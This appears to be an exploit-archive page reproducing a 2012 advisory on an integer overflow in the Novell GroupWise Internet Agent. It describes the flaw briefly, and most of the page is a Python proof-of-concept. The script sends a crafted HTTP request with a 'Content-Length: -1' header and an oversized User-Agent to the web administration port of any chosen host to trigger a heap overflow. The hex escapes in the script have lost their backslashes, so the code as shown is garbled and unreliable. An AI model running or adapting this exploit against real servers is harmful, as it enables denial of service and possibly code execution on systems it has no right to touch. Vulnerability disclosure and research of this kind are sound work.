[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Novell Groupwise 8.0.2 HP3 and 2012 Integer Overflow Vulnerability
# Published : 2012-09-17
# Author :
# Previous Title : SAP Netweaver Dispatcher 7.0 EHP1/2 Multiple Vulnerabilities
# Next Title : XnView 1.98.8 PCT Image Processing Heap Overflow
#####################################################################################
Application: Novell Groupwise
Platforms: Windows
Version: 8.0.2 HP3 and 2012
Secunia: SA50622
{PRL}: 2012-28
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) The Code
#####################################################################################
===============
1) Introduction
===============
Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in
enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems
management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse. Novell was instrumental
in making the Utah Valley a focus for technology and software development. Novell technology contributed to the
emergence of local area networks, which displaced the dominant mainframe computing model and changed computing
worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients.
(http://en.wikipedia.org/wiki/Novell)
#####################################################################################
============================
2) Report Timeline
============================
2012-02-03 Vulnerability reported to Secunia
2012-09-14 Publication of this advisory
#####################################################################################
============================
3) Technical details
============================
The vulnerability is caused due to an integer overflow error in GroupWise Internet Agent (gwia.exe)
when copying request data and can be exploited to cause a heap-based buffer overflow by e.g.
sending a specially crafted request with the "Content-Length" header value set to "-1" to the web-based
administration interface (TCP port 9850). Successful exploitation may allow execution of arbitrary code.
#####################################################################################
===========
4) The Code
===========
#!/usr/bin/python
import sys,os,socket
if len(sys.argv) < 3:
print "Usage: host,port"
sys.exit(0)
host=sys.argv[1]
port=int(sys.argv[2])
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((host,port))
sock.send("x47x45x54x20x2Fx20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax43x6Fx6Ex74x65x6Ex74x2Dx4Cx65x6Ex67x74x68x3Ax20x2Dx31x0Dx0Ax45x78x70x69x72x65x73x3Ax20x4Dx6Fx6Ex2Cx20x30x32x20x4Ax75x6Ex20x31x39x38x32x20x30x30x3Ax30x30x3Ax30x30x20x47x4Dx54x0Dx0Ax46x72x6Fx6Dx3Ax20x61x61x61x61x61x40x61x61x61x61x61x61x61x61x61x61x61x61x61x61x2Ex63x6Fx6Dx0Dx0Ax49x66x2Dx4Dx6Fx64x69x66x69x65x64x2Dx53x69x6Ex63x65x3Ax20x4Dx6Fx6Ex2Cx20x30x32x20x4Ax75x6Ex20x31x39x38x32x20x30x30x3Ax30x30x3Ax30x30x20x47x4Dx54x0Dx0Ax4Cx61x73x74x2Dx4Dx6Fx64x69x66x69x65x64x3Ax20x4Dx6Fx6Ex2Cx20x30x32x20x4Ax75x6Ex20x31x39x38x32x20x30x30x3Ax30x30x3Ax30x30x20x47x4Dx54x0Dx0Ax52x65x66x65x72x65x72x3Ax20x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex61x61x61x61x61x61x61x61x61x61x61x61x61x61x2Ex63x6Fx6Dx2Fx0Dx0Ax55x73x65x72x2Dx41x67x65x6Ex74x3Ax20x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x0Dx0Ax0Dx0A")
print "done!"
sock.close()